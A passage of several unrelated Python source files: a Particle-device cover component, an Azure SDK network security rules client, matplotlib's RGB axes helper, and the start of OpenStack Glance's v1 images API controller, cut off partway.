self._state = STATE_OFFLINE
if self._state not in [STATE_CLOSING, STATE_OPENING]:
if self._unsub_listener_cover is not None:
self._unsub_listener_cover()
self._unsub_listener_cover = None
def _get_variable(self, var):
"""Get latest status."""
url = '{}/v1/devices/{}/{}?access_token={}'.format(
self.particle_url, self.device_id, var, self.access_token)
ret = requests.get(url, timeout=10)
result = {}
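        # The Particle variable comes back as a pipe-delimited string of
        # key=value pairs, e.g. "status=open|time=12m|sensor=92|signal=-71"
        # (illustrative values); unpack it into a dict below.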
for pairs in ret.json()['result'].split('|'):
key = pairs.split('=')
result[key[0]] = key[1]
return result
def _put_command(self, func, arg=None):
"""Send commands to API."""
params = {'access_token': self.access_token}
if arg:
params['command'] = arg
url = '{}/v1/devices/{}/{}'.format(
self.particle_url, self.device_id, func)
ret = requests.post(url, data=params, timeout=10)
return ret.json()
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class SecurityRulesOperations(object):
"""SecurityRulesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2016_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.SecurityRule"
"""Get the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecurityRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2016_12_01.models.SecurityRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
accept = "application/json, text/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
security_rule_parameters, # type: "_models.SecurityRule"
**kwargs # type: Any
):
# type: (...) -> "_models.SecurityRule"
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(security_rule_parameters, 'SecurityRule')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('SecurityRule', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
security_rule_parameters, # type: "_models.SecurityRule"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.SecurityRule"]
"""Creates or updates a security rule in the specified network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:param security_rule_parameters: Parameters supplied to the create or update network security
rule operation.
:type security_rule_parameters: ~azure.mgmt.network.v2016_12_01.models.SecurityRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either SecurityRule or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_12_01.models.SecurityRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
security_rule_parameters=security_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.SecurityRuleListResult"]
"""Gets all security rules in a network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecurityRuleListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_12_01.models.SecurityRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SecurityRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules'} # type: ignore
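# Illustrative usage sketch (not part of the generated code). This operation
# group is normally reached through a NetworkManagementClient instance; the
# attribute name `security_rules` and the variable names below are assumptions
# for the example only:
#
#   client = NetworkManagementClient(credential, subscription_id)
#   poller = client.security_rules.begin_create_or_update(
#       resource_group_name, network_security_group_name,
#       security_rule_name, security_rule_parameters)
#   rule = poller.result()  # block until the long-running operation completes
#   for rule in client.security_rules.list(resource_group_name,
#                                           network_security_group_name):
#       print(rule.name)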
|
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from matplotlib.externals import six
import numpy as np
from .axes_divider import make_axes_locatable, Size, locatable_axes_factory
import sys
from .mpl_axes import Axes
def make_rgb_axes(ax, pad=0.01, axes_class=None, add_all=True):
"""
pad : fraction of the axes height.
"""
divider = make_axes_locatable(ax)
pad_size = Size.Fraction(pad, Size.AxesY(ax))
xsize = Size.Fraction((1.-2.*pad)/3., Size.AxesX(ax))
ysize = Size.Fraction((1.-2.*pad)/3., Size.AxesY(ax))
divider.set_horizontal([Size.AxesX(ax), pad_size, xsize])
divider.set_vertical([ysize, pad_size, ysize, pad_size, ysize])
ax.set_axes_locator(divider.new_locator(0, 0, ny1=-1))
ax_rgb = []
if axes_class is None:
try:
axes_class = locatable_axes_factory(ax._axes_class)
except AttributeError:
axes_class = locatable_axes_factory(type(ax))
for ny in [4, 2, 0]:
ax1 = axes_class(ax.get_figure(),
ax.get_position(original=True),
sharex=ax, sharey=ax)
locator = divider.new_locator(nx=2, ny=ny)
ax1.set_axes_locator(locator)
for t in ax1.yaxis.get_ticklabels() + ax1.xaxis.get_ticklabels():
t.set_visible(False)
try:
for axis in ax1.axis.values():
axis.major_ticklabels.set_visible(False)
except AttributeError:
pass
ax_rgb.append(ax1)
if add_all:
fig = ax.get_figure()
for ax1 in ax_rgb:
fig.add_axes(ax1)
return ax_rgb
def imshow_rgb(ax, r, g, b, **kwargs):
ny, nx = r.shape
R = np.zeros([ny, nx, 3], dtype="d")
R[:,:,0] = r
G = np.zeros_like(R)
G[:,:,1] = g
B = np.zeros_like(R)
B[:,:,2] = b
RGB = R + G + B
im_rgb = ax.imshow(RGB, **kwargs)
return im_rgb
class RGBAxesBase(object):
"""base class for a 4-panel imshow (RGB, R, G, B)
Layout:
+---------------+-----+
| | R |
+ +-----+
| RGB | G |
+ +-----+
| | B |
+---------------+-----+
Attributes
----------
_defaultAxesClass : matplotlib.axes.Axes
defaults to 'Axes' in RGBAxes child class.
No default in abstract base class
RGB : _defaultAxesClass
The axes object for the three-channel imshow
R : _defaultAxesClass
The axes object for the red channel imshow
G : _defaultAxesClass
The axes object for the green channel imshow
B : _defaultAxesClass
The axes object for the blue channel imshow
"""
def __init__(self, *kl, **kwargs):
"""
Parameters
----------
pad : float
fraction of the axes height to put as padding.
defaults to 0.0
add_all : bool
True: Add the {rgb, r, g, b} axes to the figure
defaults to True.
axes_class : matplotlib.axes.Axes
kl :
Unpacked into axes_class() init for RGB
kwargs :
Unpacked into axes_class() init for RGB, R, G, B axes
"""
pad = kwargs.pop("pad", 0.0)
add_all = kwargs.pop("add_all", True)
try:
axes_class = kwargs.pop("axes_class", self._defaultAxesClass)
except AttributeError:
new_msg = ("A subclass of RGBAxesBase must have a "
"_defaultAxesClass attribute. If you are not sure which "
"axes class to use, consider using "
"mpl_toolkits.axes_grid1.mpl_axes.Axes.")
six.reraise(AttributeError, AttributeError(new_msg),
sys.exc_info()[2])
ax = axes_class(*kl, **kwargs)
divider = make_axes_locatable(ax)
pad_size = Size.Fraction(pad, Size.AxesY(ax))
xsize = Size.Fraction((1.-2.*pad)/3., Size.AxesX(ax))
ysize = Size.Fraction((1.-2.*pad)/3., Size.AxesY(ax))
divider.set_horizontal([Size.AxesX(ax), pad_size, xsize])
divider.set_vertical([ysize, pad_size, ysize, pad_size, ysize])
ax.set_axes_locator(divider.new_locator(0, 0, ny1=-1))
ax_rgb = []
for ny in [4, 2, 0]:
ax1 = axes_class(ax.get_figure(),
ax.get_position(original=True),
sharex=ax, sharey=ax, **kwargs)
locator = divider.new_locator(nx=2, ny=ny)
ax1.set_axes_locator(locator)
ax1.axis[:].toggle(ticklabels=False)
ax_rgb.append(ax1)
self.RGB = ax
self.R, self.G, self.B = ax_rgb
if add_all:
fig = ax.get_figure()
fig.add_axes(ax)
self.add_RGB_to_figure()
self._config_axes()
def _config_axes(self, line_color='w', marker_edge_color='w'):
"""Set the line color and ticks for the axes
Parameters
----------
line_color : any matplotlib color
marker_edge_color : any matplotlib color
"""
for ax1 in [self.RGB, self.R, self.G, self.B]:
ax1.axis[:].line.set_color(line_color)
ax1.axis[:].major_ticks.set_markeredgecolor(marker_edge_color)
def add_RGB_to_figure(self):
"""Add the red, green and blue axes to the RGB composite's axes figure
"""
self.RGB.get_figure().add_axes(self.R)
self.RGB.get_figure().add_axes(self.G)
self.RGB.get_figure().add_axes(self.B)
def imshow_rgb(self, r, g, b, **kwargs):
"""Create the four images {rgb, r, g, b}
Parameters
----------
r : array-like
The red array
g : array-like
The green array
b : array-like
The blue array
kwargs : imshow kwargs
kwargs get unpacked into the imshow calls for the four images
Returns
-------
rgb : matplotlib.image.AxesImage
r : matplotlib.image.AxesImage
g : matplotlib.image.AxesImage
b : matplotlib.image.AxesImage
"""
ny, nx = r.shape
        if not ((ny, nx) == g.shape == b.shape):
raise ValueError('Input shapes do not match.'
'\nr.shape = {}'
'\ng.shape = {}'
'\nb.shape = {}'
''.format(r.shape, g.shape, b.shape))
R = np.zeros([ny, nx, 3], dtype="d")
R[:,:,0] = r
G = np.zeros_like(R)
G[:,:,1] = g
B = np.zeros_like(R)
B[:,:,2] = b
RGB = R + G + B
im_rgb = self.RGB.imshow(RGB, **kwargs)
im_r = self.R.imshow(R, **kwargs)
im_g = self.G.imshow(G, **kwargs)
im_b = self.B.imshow(B, **kwargs)
return im_rgb, im_r, im_g, im_b
class RGBAxes(RGBAxesBase):
_defaultAxesClass = Axes
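# Illustrative usage sketch (an addition, not part of the original module):
# build an RGBAxes panel and feed it three equally shaped channel arrays.
# The random data and the figure rectangle below are assumptions for the
# example only.
if __name__ == '__main__':
    import matplotlib.pyplot as plt
    fig = plt.figure()
    rgb_ax = RGBAxes(fig, [0.1, 0.1, 0.8, 0.8], pad=0.05)
    r = np.random.rand(32, 32)
    g = np.random.rand(32, 32)
    b = np.random.rand(32, 32)
    rgb_ax.imshow_rgb(r, g, b)
    plt.show()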
|
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
/images endpoint for Glance v1 API
"""
import copy
import eventlet
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from webob.exc import HTTPBadRequest
from webob.exc import HTTPConflict
from webob.exc import HTTPForbidden
from webob.exc import HTTPMethodNotAllowed
from webob.exc import HTTPNotFound
from webob.exc import HTTPRequestEntityTooLarge
from webob import Response
from glance.api import common
from glance.api import policy
import glance.api.v1
from glance.api.v1 import controller
from glance.api.v1 import filters
from glance.api.v1 import upload_utils
from glance.common import exception
from glance.common import property_utils
from glance.common import utils
from glance.common import wsgi
from glance import notifier
from glance.openstack.common import excutils
import glance.openstack.common.log as logging
from glance.openstack.common import strutils
import glance.registry.client.v1.api as registry
from glance.store import get_from_backend
from glance.store import get_known_schemes
from glance.store import get_known_stores
from glance.store import get_size_from_backend
from glance.store import get_store_from_location
from glance.store import get_store_from_scheme
from glance.store import validate_location
LOG = logging.getLogger(__name__)
SUPPORTED_PARAMS = glance.api.v1.SUPPORTED_PARAMS
SUPPORTED_FILTERS = glance.api.v1.SUPPORTED_FILTERS
ACTIVE_IMMUTABLE = glance.api.v1.ACTIVE_IMMUTABLE
CONF = cfg.CONF
CONF.import_opt('disk_formats', 'glance.common.config', group='image_format')
CONF.import_opt('container_formats', 'glance.common.config',
group='image_format')
CONF.import_opt('image_property_quota', 'glance.common.config')
def validate_image_meta(req, values):
name = values.get('name')
disk_format = values.get('disk_format')
container_format = values.get('container_format')
if 'disk_format' in values:
if disk_format not in CONF.image_format.disk_formats:
msg = _("Invalid disk format '%s' for image.") % disk_format
raise HTTPBadRequest(explanation=msg, request=req)
if 'container_format' in values:
if container_format not in CONF.image_format.container_formats:
msg = _("Invalid container format '%s' "
"for image.") % container_format
raise HTTPBadRequest(explanation=msg, request=req)
if name and len(name) > 255:
msg = _('Image name too long: %d') % len(name)
raise HTTPBadRequest(explanation=msg, request=req)
amazon_formats = ('aki', 'ari', 'ami')
if disk_format in amazon_formats or container_format in amazon_formats:
if disk_format is None:
values['disk_format'] = container_format
elif container_format is None:
values['container_format'] = disk_format
elif container_format != disk_format:
msg = (_("Invalid mix of disk and container formats. "
"When setting a disk or container format to "
"one of 'aki', 'ari', or 'ami', the container "
"and disk formats must match."))
raise HTTPBadRequest(explanation=msg, request=req)
return values
def redact_loc(image_meta, copy_dict=True):
"""
Create a shallow copy of image meta with 'location' removed
for security (as it can contain credentials).
"""
if copy_dict:
new_image_meta = copy.copy(image_meta)
else:
new_image_meta = image_meta
new_image_meta.pop('location', None)
new_image_meta.pop('location_data', None)
return new_image_meta
class Controller(controller.BaseController):
"""
WSGI controller for images resource in Glance v1 API
The images resource API is a RESTful web service for image data. The API
is as follows::
GET /images -- Returns a set of brief metadata about images
GET /images/detail -- Returns a set of detailed metadata about
images
HEAD /images/<ID> -- Return metadata about an image with id <ID>
GET /images/<ID> -- Return image data for image with id <ID>
POST /images -- Store image data and return metadata about the
newly-stored image
PUT /images/<ID> -- Update image metadata and/or upload image
data for a previously-reserved image
DELETE /images/<ID> -- Delete the image with id <ID>
"""
def __init__(self):
self.notifier = notifier.Notifier()
registry.configure_registry_client()
self.policy = policy.Enforcer()
self.pool = eventlet.GreenPool(size=1024)
if property_utils.is_property_protection_enabled():
self.prop_enforcer = property_utils.PropertyRules(self.policy)
else:
self.prop_enforcer = None
def _enforce(self, req, action):
"""Authorize an action against our policies"""
try:
self.policy.enforce(req.context, action, {})
except exception.Forbidden:
raise HTTPForbidden()
def _enforce_image_property_quota(self,
image_meta,
orig_image_meta=None,
purge_props=False,
req=None):
if CONF.image_property_quota < 0:
# If value is negative, allow unlimited number of properties
return
props = image_meta['properties'].keys()
# NOTE(ameade): If we are not removing existing properties,
# take them in to account
if (not purge_props) and orig_image_meta:
original_props = orig_image_meta['properties'].keys()
props.extend(original_props)
props = set(props)
if len(props) > CONF.image_property_quota:
msg = (_("The limit has been exceeded on the number of allowed "
"image properties. Attempted: %(num)s, Maximum: "
"%(quota)s") % {'num': len(props),
'quota': CONF.image_property_quota})
LOG.info(msg)
raise HTTPRequestEntityTooLarge(explanation=msg,
request=req,
content_type="text/plain")
def _enforce_create_protected_props(self, create_props, req):
"""
Check request is permitted to create certain properties
:param create_props: List of properties to check
:param req: The WSGI/Webob Request object
:raises HTTPForbidden if request forbidden to create a property
"""
if property_utils.is_property_protection_enabled():
for key in create_props:
if (self.prop_enforcer.check_property_rules(
key, 'create', req.context) is False):
msg = "Property '%s' is protected" % key
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def _enforce_read_protected_props(self, image_meta, req):
"""
Remove entries from metadata properties if they are read protected
:param image_meta: Mapping of metadata about image
:param req: The WSGI/Webob Request object
"""
if property_utils.is_property_protection_enabled():
for key in image_meta['properties'].keys():
if (self.prop_enforcer.check_property_rules(
key, 'read', req.context) is False):
image_meta['properties'].pop(key)
def _enforce_update_protected_props(self, update_props, image_meta,
orig_meta, req):
"""
Check request is permitted to update certain properties. Read
permission is required to delete a property.
If the property value is unchanged, i.e. a noop, it is permitted,
however, it is important to ensure read access first. Otherwise the
value could be discovered using brute force.
:param update_props: List of properties to check
:param image_meta: Mapping of proposed new metadata about image
:param orig_meta: Mapping of existing metadata about image
:param req: The WSGI/Webob Request object
:raises HTTPForbidden if request forbidden to create a property
"""
if property_utils.is_property_protection_enabled():
for key in update_props:
has_read = self.prop_enforcer.check_property_rules(
key, 'read', req.context)
if ((self.prop_enforcer.check_property_rules(
key, 'update', req.context) is False and
image_meta['properties'][key] !=
orig_meta['properties'][key]) or not has_read):
msg = "Property '%s' is protected" % key
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def _enforce_delete_protected_props(self, delete_props, image_meta,
orig_meta, req):
"""
Check request is permitted to delete certain properties. Read
permission is required to delete a property.
Note, the absence of a property in a request does not necessarily
indicate a delete. The requester may not have read access, and so can
not know the property exists. Hence, read access is a requirement for
delete, otherwise the delete is ignored transparently.
:param delete_props: List of properties to check
:param image_meta: Mapping of proposed new metadata about image
:param orig_meta: Mapping of existing metadata about image
:param req: The WSGI/Webob Request object
:raises HTTPForbidden if request forbidden to create a property
"""
if property_utils.is_property_protection_enabled():
for key in delete_props:
if (self.prop_enforcer.check_property_rules(
key, 'read', req.context) is False):
# NOTE(bourke): if read protected, re-add to image_meta to
# prevent deletion
image_meta['properties'][key] = \
orig_meta['properties'][key]
elif (self.prop_enforcer.check_property_rules(
key, 'delete', req.context) is False):
msg = "Property '%s' is protected" % key
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def index(self, req):
"""
Returns the following information for all public, available images:
* id -- The opaque image identifier
* name -- The name of the image
* disk_format -- The disk image format
* container_format -- The "container" format of the image
* checksum -- MD5 checksum of the image data
* size -- Size of image data in bytes
:param req: The WSGI/Webob Request object
:retval The response body is a mapping of the following form::
{'images': [
{'id': <ID>,
'name': <NAME>,
'disk_format': <DISK_FORMAT>,
                 'container_format': <CONTAINER_FORMAT>,
                 'checksum': <CHECKSUM>,
'size': <SIZE>}, ...
]}
"""
self._enforce(req, 'get_images')
params = self._get_query_params(req)
try:
images = registry.get_images_list(req.context, **params)
except exception.Invalid as e:
raise HTTPBadRequest(explanation="%s" % e)
return dict(images=images)
def detail(self, req):
"""
